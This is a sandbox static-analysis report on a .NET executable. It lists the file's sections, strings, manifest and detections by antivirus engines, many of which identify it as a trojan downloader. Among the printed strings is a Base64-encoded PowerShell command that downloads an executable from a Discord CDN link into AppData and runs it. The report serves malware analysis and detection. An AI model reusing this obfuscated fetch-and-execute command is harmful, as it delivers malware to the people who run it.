popup
Static | ZeroBOX
  1. Home
  2. Result
  3. Report
  4. Detail Analysis

Static Analysis

PE Compile Time

2022-11-17 01:36:28

PE Imphash

f34d5f2d4577ed6d9ceec516c1f5a744

Sections

Name Virtual Address Virtual Size Size of Raw Data Entropy
.text 0x00002000 0x00000c04 0x00000e00 3.56049173123
.rsrc 0x00004000 0x000005b0 0x00000600 4.33475280473
.reloc 0x00006000 0x0000000c 0x00000200 0.0611628522412

Resources

Name Offset Size Language Sub-language File type
RT_VERSION 0x000040a0 0x00000264 LANG_NEUTRAL SUBLANG_NEUTRAL data
RT_MANIFEST 0x00004308 0x000002a4 LANG_NEUTRAL SUBLANG_NEUTRAL XML 1.0 document, ASCII text

Imports

Library mscoree.dll:
0x402000 _CorExeMain
!This program cannot be run in DOS mode.
`.rsrc
@.reloc
v4.0.30319
#Strings
<Module>
hjasgfhjasgdas.exe
cvyttwkjunfgwvmjlrv
mscorlib
System
Object
System.Runtime.CompilerServices
CompilationRelaxationsAttribute
RuntimeCompatibilityAttribute
hjasgfhjasgdas
System.Diagnostics
ProcessStartInfo
set_FileName
set_Arguments
ProcessWindowStyle
set_WindowStyle
set_CreateNoWindow
Process
WrapNonExceptionThrows
_CorExeMain
mscoree.dll
<?xml version="1.0" encoding="utf-8" ?>
<asmv1:assembly manifestVersion="1.0" xmlns="urn:schemas-microsoft-com:asm.v1" xmlns:asmv1="urn:schemas-microsoft-com:asm.v1" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
<assemblyIdentity version="7.4.9.4" name="jppdgxhykpfleqzznvfueyxqiqqwwdlgadc" />
<trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">
<security>
<requestedPrivileges xmlns="urn:schemas-microsoft-com:asm.v3">
<requestedExecutionLevel level="asInvoker" uiAccess="false" />
</requestedPrivileges>
</security>
</trustInfo>
</asmv1:assembly>
powershell
-EncodedCommand "PAAjAHIAeQB1ACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAA1ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGMAZABuAC4AZABpAHMAYwBvAHIAZABhAHAAcAAuAGMAbwBtAC8AYQB0AHQAYQBjAGgAbQBlAG4AdABzAC8AMQAwADQAMgA0ADcANwA0ADEANwA2ADYAOAA4ADAAOAA3ADgANQAvADEAMAA0ADIANAA3ADcANQAwADYANAA4ADMAMQA5ADUAOQA2ADQALwBwAGwAbABtAG0AZABpAGkAcABtAC4AZQB4AGUAJwAsACAAPAAjAGwAdgBkACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAdABqAHcAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAawBlAGEAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAZABzAGYAZgBlADQAdgBiADUALgBlAHgAZQAnACkAKQA8ACMAZQB6AHcAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAYgByAHEAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAGcAcQB1ACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAGQAcwBmAGYAZQA0AHYAYgA1AC4AZQB4AGUAJwApADwAIwByAHMAawAjAD4A"
VS_VERSION_INFO
VarFileInfo
Translation
StringFileInfo
000004b0
FileDescription
FileVersion
0.0.0.0
InternalName
hjasgfhjasgdas.exe
LegalCopyright
OriginalFilename
hjasgfhjasgdas.exe
ProductVersion
0.0.0.0
Assembly Version
0.0.0.0
Antivirus Signature
Bkav W32.AIDetectNet.01
Lionic Clean
tehtris Clean
MicroWorld-eScan Gen:Variant.Marsilia.2083
ClamAV Clean
CMC Clean
CAT-QuickHeal Clean
ALYac Gen:Variant.Marsilia.2083
Malwarebytes Clean
Zillya Clean
Sangfor Clean
K7AntiVirus Clean
BitDefender Gen:Variant.Marsilia.2083
K7GW Clean
Cybereason Clean
Baidu Clean
VirIT Clean
Cyren W32/MSIL_Agent.DIE.gen!Eldorado
Symantec ML.Attribute.HighConfidence
Elastic malicious (high confidence)
ESET-NOD32 a variant of MSIL/TrojanDownloader.Agent.MAE
APEX Malicious
Paloalto Clean
Cynet Malicious (score: 99)
Kaspersky HEUR:Trojan-Downloader.MSIL.PsDownload.gen
Alibaba Clean
NANO-Antivirus Clean
SUPERAntiSpyware Clean
Tencent Clean
Ad-Aware Gen:Variant.Marsilia.2083
Sophos Clean
Comodo Clean
F-Secure Trojan.TR/Dldr.Agent.nhtye
DrWeb Clean
VIPRE Gen:Variant.Marsilia.2083
TrendMicro Clean
McAfee-GW-Edition BehavesLike.Win32.Generic.xz
Trapmine Clean
FireEye Generic.mg.378deda0d1313deb
Emsisoft Gen:Variant.Marsilia.2083 (B)
Ikarus Trojan.MSIL.CoinMiner
GData Gen:Variant.Marsilia.2083
Jiangmin Clean
Webroot Clean
Avira TR/Dldr.Agent.nhtye
MAX malware (ai score=82)
Antiy-AVL Clean
Kingsoft Clean
Gridinsoft Clean
Arcabit Trojan.Marsilia.D823
ViRobot Clean
ZoneAlarm HEUR:Trojan-Downloader.MSIL.PsDownload.gen
Microsoft Trojan:MSIL/AsyncRat.NEAG!MTB
Google Detected
AhnLab-V3 Trojan/Win.Generic.C5148890
Acronis Clean
McAfee Artemis!378DEDA0D131
TACHYON Clean
VBA32 Clean
Cylance Clean
Panda Clean
Zoner Clean
TrendMicro-HouseCall Clean
Rising Clean
Yandex Clean
SentinelOne Static AI - Suspicious PE
MaxSecure Clean
Fortinet MSIL/Agent.MAE!tr
BitDefenderTheta Gen:NN.ZemsilF.36106.am0@aS36YZf
AVG Win32:Trojan-gen
Avast Win32:Trojan-gen
No IRMA results available.